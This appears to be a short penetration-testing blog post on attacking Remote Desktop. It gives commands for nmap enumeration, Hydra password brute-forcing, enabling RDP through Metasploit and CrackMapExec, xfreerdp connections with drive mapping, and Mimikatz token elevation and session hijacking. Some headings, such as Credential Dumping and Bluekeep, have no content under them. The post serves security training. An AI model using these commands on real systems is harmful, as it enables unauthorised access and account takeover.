Welcome, today I am writing about RDP Penetration Testing fundamentals, I will explain how to enumerate Remote Desktop Service and how to use it to escalate privileges.

RDP Introduction

RDP Penetration Testing

RDP Enumeration

nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" 192.168.1.131 -p3389

Brute Force RDP

hydra -L userslist.txt -P wordlist.txt 192.168.1.131 rdp

Metasploit

use post/windows/mange/enable_rdp
set username rfs
set password Password123!
set session 1
exploit

CrackMapExec

crackmapexec smb '' -u '' -p '' -M rdp -o ACTION=enable

Post Exploitation

Connecting to RDP

xfreerdp /v:'' /u:'' /p:''
xfreerdp /v:'' /u:'' /p:'' +clipboard
#Maps specified folder on attacking machine to RDP host
xfreerdp /v:'' /u:'' /p:'' +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share

Credential Dumping

RDP Session Hijacking

Invoke-Mimikatz -Command '"ts::sessions"'
Invoke-Mimikatz -Command '"token::elevate" "ts::remote /id:4"'

Socks5 over RDP

https://github.com/nccgroup/SocksOverRDP

RDP Exploits

Bluekeep

SMTP Penetration Testing

SNMP Penetration Testing

SSH Penetration Testing

NetBios Penetration Testing

FTP penetration testing

RDP Hacking

Avatar of RFS

RFS (104)

Network Penetration Testing, Penetration Testing

Tagged in: